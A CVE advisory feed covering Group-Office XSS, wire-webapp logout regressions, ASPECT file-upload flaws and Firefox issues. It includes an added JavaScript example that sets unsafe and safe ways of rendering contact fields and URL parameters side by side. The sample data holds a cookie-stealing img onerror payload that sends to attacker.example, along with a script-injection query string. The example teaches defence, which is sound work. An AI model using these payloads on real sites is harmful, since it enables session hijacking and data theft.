CVE-2025-48368
Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.119 and 25.0.20, a DOM-based Cross-Site Scripting (XSS) vulnerability exists in the GroupOffice application, allowing attackers to execute arbitrary JavaScript code in the context of the victim's browser. This can lead to session hijacking, defacement, or redirection to malicious sites. The vulnerability can be triggered by injecting a crafted payload into a parameter that is later processed unsafely in the DOM. Versions 6.8.119 and 25.0.20 contain a fix for the issue.
CVSS: MEDIUM (5.4) EPSS Score: 0.03% SSVC Exploitation: poc
May 22nd, 2025

CVE-2025-48366
Description: Group-Office is an enterprise customer relationship management and groupware tool. Prior to versions 6.8.119 and 25.0.20, a stored and blind XSS vulnerability exists in the Phone Number field of the user profile within the GroupOffice application. This allows a malicious actor to inject persistent JavaScript payloads, which are triggered in the context of another user when they view the Address Book. Successful exploitation enables actions such as forced redirects, unauthorized fetch requests, or other arbitrary JavaScript execution without user interaction. Versions 6.8.119 and 25.0.20 contain a fix for the issue.
CVSS: MEDIUM (5.4) EPSS Score: 0.03% SSVC Exploitation: poc
May 22nd, 2025

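The two Group-Office entries above describe the two classic XSS shapes: a stored payload in a profile field (the phone number) rendered later for other users, and a DOM-based sink fed from a URL parameter. The following is an added example, not Group-Office code, showing each shape beside its fix in browser JavaScript. The field names, the `msg` query parameter, the attacker URL and the sample contact are constructed for the demonstration.

```javascript
// Added example (not Group-Office code): the two XSS shapes from the advisories
// above, each beside its fix. Stored XSS: a profile field such as the phone
// number is saved once and later rendered for every user who opens the address
// book. DOM-based XSS: a URL parameter is copied into the page through an HTML
// sink. The defence is the same in both cases: validate narrow fields on input,
// and on output treat every untrusted value as text, never as markup.
// Field names, the "msg" parameter and the attacker URL are constructed.

// A phone number has a small alphabet, so an allowlist is cheap and rejects the
// characters a payload needs ("<", ">", quotes) before anything is stored.
const PHONE_RE = /^\+?[0-9 ().-]{3,32}$/;

function isValidPhone(value) {
  return typeof value === "string" && PHONE_RE.test(value);
}

// Output encoding for an HTML text node or double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Stored shape. Both functions build the HTML an address-book view would assign
// to innerHTML; only the second encodes the stored fields.
function renderContactUnsafe(contact) {
  return `<li>${contact.name}: ${contact.phone}</li>`;
}

function renderContactSafe(contact) {
  return `<li>${escapeHtml(contact.name)}: ${escapeHtml(contact.phone)}</li>`;
}

// DOM-based shape. `search` is location.search. The unsafe version writes the
// parameter through innerHTML, which the browser parses as HTML; the safe
// version uses textContent, which it never parses. `el` is a DOM Element in the
// browser and a plain object when run outside one.
function getParam(search, name) {
  return new URLSearchParams(search).get(name) ?? "";
}

function showMessageUnsafe(el, search) {
  el.innerHTML = "Message: " + getParam(search, "msg");
  return el.innerHTML;
}

function showMessageSafe(el, search) {
  el.textContent = "Message: " + getParam(search, "msg");
  return el.textContent;
}

// Constructed sample input: a stored payload that exfiltrates the session
// cookie, and a query string carrying a script tag.
const STORED_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
const SAMPLE_CONTACT = { name: "Mallory", phone: STORED_PAYLOAD };
const SAMPLE_SEARCH = "?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E";

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log("valid phone?", isValidPhone(STORED_PAYLOAD));
  console.log("unsafe:", renderContactUnsafe(SAMPLE_CONTACT));
  console.log("safe:  ", renderContactSafe(SAMPLE_CONTACT));
  console.log("safe DOM:", showMessageSafe({}, SAMPLE_SEARCH));
}
```

The cookie-stealing payload only succeeds when the session cookie lacks `HttpOnly`; that flag and a Content-Security-Policy reduce the impact of the unsafe renderers but do not replace output encoding, which is the actual fix.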
CVE-2025-48066
Description: wire-webapp is the web application for the open-source messaging service Wire. A bug fix caused a regression in the function that deletes local data: instructing the client to delete its local database on user logout does not result in deletion. This affects both temporary clients (the device was marked as a public computer at login) and regular clients that request deletion of all personal information and conversations upon logout. Access to the machine is required to access the data. If encryption-at-rest is used, cryptographic material cannot be exported. The underlying issue has been fixed in wire-webapp version 2025-05-14-production.0. To mitigate the impact, the database must be deleted manually on devices where, while running an affected version, the option "This is a public computer" was selected before login or a logout with the request to delete local data was performed.
CVSS: MEDIUM (6.0) EPSS Score: 0.01%
May 22nd, 2025

CVE-2025-48061
Description: wire-webapp is the web application for the open-source messaging service Wire. A change caused a regression resulting in sessions not being properly invalidated: a user who logged out of the Wire webapp could have been logged in again automatically after re-opening the application. This does not happen when the user logged in as a temporary user by selecting "This is a public computer", or selected "Delete all your personal information and conversations on this device" upon logout. The underlying issue has been fixed in wire-webapp version 2025-05-20-production.0. As a workaround, the behavior can be prevented either by deleting all information upon logout or by logging in as a temporary client.
CVSS: MEDIUM (5.6) EPSS Score: 0.01% SSVC Exploitation: none
May 22nd, 2025

CVE-2025-30173
Description: File upload vulnerabilities are present in ASPECT if session administrator credentials become compromised.
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (6.7) EPSS Score: 0.05%
May 22nd, 2025

CVE-2025-30170
Description: Exposure of file path, file size or file existence vulnerabilities in ASPECT provide attackers access to file system information if session administrator credentials become compromised.
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (5.5) EPSS Score: 0.04%
May 22nd, 2025

CVE-2025-30169
Description: File upload and execute vulnerabilities in ASPECT allow PHP script injection if session administrator credentials become compromised.
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (6.0) EPSS Score: 0.05%
May 22nd, 2025

CVE-2024-13930
Description: An Unchecked Loop Condition in ASPECT provides an attacker the ability to maliciously consume system resources if session administrator credentials become compromised.
This issue affects ASPECT-Enterprise: through 3.08.03; NEXUS Series: through 3.08.03; MATRIX Series: through 3.08.03.
CVSS: MEDIUM (4.9) EPSS Score: 0.06%
May 22nd, 2025

CVE-2024-0754
Description: Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122.
CVSS: MEDIUM (6.5) EPSS Score: 0.19% SSVC Exploitation: none
May 22nd, 2025

CVE-2024-0749
Description: A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122 and Thunderbird < 115.7.
CVSS: MEDIUM (4.3) EPSS Score: 0.34% SSVC Exploitation: none
May 22nd, 2025